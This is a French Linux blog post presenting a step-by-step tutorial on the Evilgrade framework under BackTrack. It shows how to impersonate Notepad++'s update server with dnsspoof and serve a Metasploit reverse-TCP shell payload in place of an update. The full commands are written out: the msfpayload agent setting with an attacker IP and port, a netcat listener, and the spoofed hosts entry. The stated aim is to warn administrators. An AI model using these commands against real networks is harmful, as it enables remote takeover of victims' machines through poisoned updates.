K1dr3k


Le blog d’un passionné de Linux et des produits OpenSource

août 15, 2011

Sécurité — Evilgrade Framework + BackTrack

White Ninja

En ce jour, je vais vous faire part de mon expérience concernant un logiciel usurpant l’identité des différents éditeurs de logiciels afin d’informer ceux-ci d’une nouvelle mise à jour disponible. Dès lors que le logiciel lance sa mise à jour, une backdoor est envoyée en lieu et place de l’update, une connexion sur le pc cible est alors créée pour le plus grand bonheur d’une personne malveillante.

Le but de cet article est de sensibiliser les administrateurs système et sécurité des entreprises aux différentes possibilité offertes à une personne malveillante au sein de votre réseau. !!


Introduction

Le produit qui offre toutes ces possibilités est Evilgrade édité par : Infobytesec.
Cet outil est un framework se présentant de la même manière que metasploit sous forme de console, et offrant une multitude de module en fonction du logiciel cible souhaité.
Les modules présents sont :
- opera
- itunes
- quicktime
- winamp
- notepad ++
- etc …

Aujourd’hui nous allons nous intéresser à Notepad++.

 

Pré-requis

Afin de prévenir quelques erreurs lors de la compilation de Evilgrade, vérifions que le module perl dump est présent au sein du système.

root@bt:# cpan Data::Dump

Une fois le module dump installé, nous allons récupérer les sources du framework Evilgrade sur le site de son éditeur.

root@bt:# tar xvzf isr-evilgrade-2.0.0.tar.gz
root@bt:# cd isr-evilgrade/

et voilà l’installation est terminée.

Pour les pré-requis, il ne manque plus que le paquet dnsspoof présent au sein de dsniff.

root@bt:# apt-get install dsniff

 

Evilgrade en action

Nous allons maintenant pouvoir tester evilgrade, pour ce faire « mettons nous en situation ».

root@bt:~/Desktop/isr-evilgrade# ./evilgrade
            _ _                     _
           (_) |                   | |
  _____   ___| | __ _ _ __ __ _  __| | ___
 / _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
|  __/\ V /| | | (_| | | | (_| | (_| |  __/
 \___| \_/ |_|_|\__, |_|  \__,_|\__,_|\___|
                __/ |
                |___/
-------------------------------------------
---------------------  www.infobytesec.com
- 63 modules available.
evilgrade>

Une fois lancé, nous allons charger le module notepad++ afin de le configurer.

evilgrade> conf notepadplus

Vous pouvez d’ailleurs consulter toutes les options offertes par ce module.

evilgrade(notepadplus)>show options
Display options:
===============
Name = notepadplus
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = "The notepad++ use GUP generic update process so it''s boggy too."
VirtualHost = "notepad-plus.sourceforge.net"
.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable |                 1 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'

Nous allons modifier l’agent afin que celui-ci pointe sur une backdoor générée par metasploit.

evilgrade(notepadplus)> set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp
                        LHOST=10.0.0.1 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

A vous de modifier les variables avec vos propres valeurs.
Une fois tout ceci effectué, il ne nous reste plus qu’à lancer le serveur web et dns.

evilgrade(notepadplus)> start

Maintenant que le backdoor est en place avec un reverse tcp sur le port 1234, nous devons lancer netcat en écoute pour pouvoir ensuite intéragir sur la session du poste cible.

root@bt:# nc -l -v -p 1234

 

Adaptation face à un refus du serveur DNS de se lancer

Ayant rencontré quelques problèmes avec le serveur DNS intégrer à evilgrade, je me suis retourné sur dnsspoof.
A travers une autre console, nous allons donc utiliser cet utilitaire pour usurper l’identité du serveur notepad-plus.sourceforge.net.

root@bt:# vi hosts
-
10.0.0.1        notepad-plus.sourceforge.net
root@bt:# dnsspoof -i eth0 -f hosts

 

Vue par le poste cible

Du côté du poste de la victime, si la mise à jour automatique est activée, notepad++ va rechercher lors de son lancement la présence d’une mise à jour sur le site de l’éditeur.
Avec DnsSpoof, désormais le site de l’éditeur est le serveur evilgrade.
Evilgrade va alors informer le pc cible qu’une mise à jour est disponible prête à être téléchargée. Notepad++ va ainsi télécharger la backdoor fournit et l’exécuter…sniff…c’est la fin..

En effet, lors de l’exécution de la backdoor, le pc cible va ouvrir une connexion sur le serveur evilgrade sur le port 1234. Vous devriez obtenir à ce moment là un beau terminal en lieu et place de votre netcat avec C:\Program Files\…

 

Conclusion

Pour conclure méfiez vous des mises à jours automatiques surtout sur un réseau local (non connecté à l’Internet).






Category: Linux - Admin, Linux - Sécurité, Sécurité

Tagged:

Leave a Reply

Vidéo virale par ebuzzing

 

Page optimized by WP Minify WordPress Plugin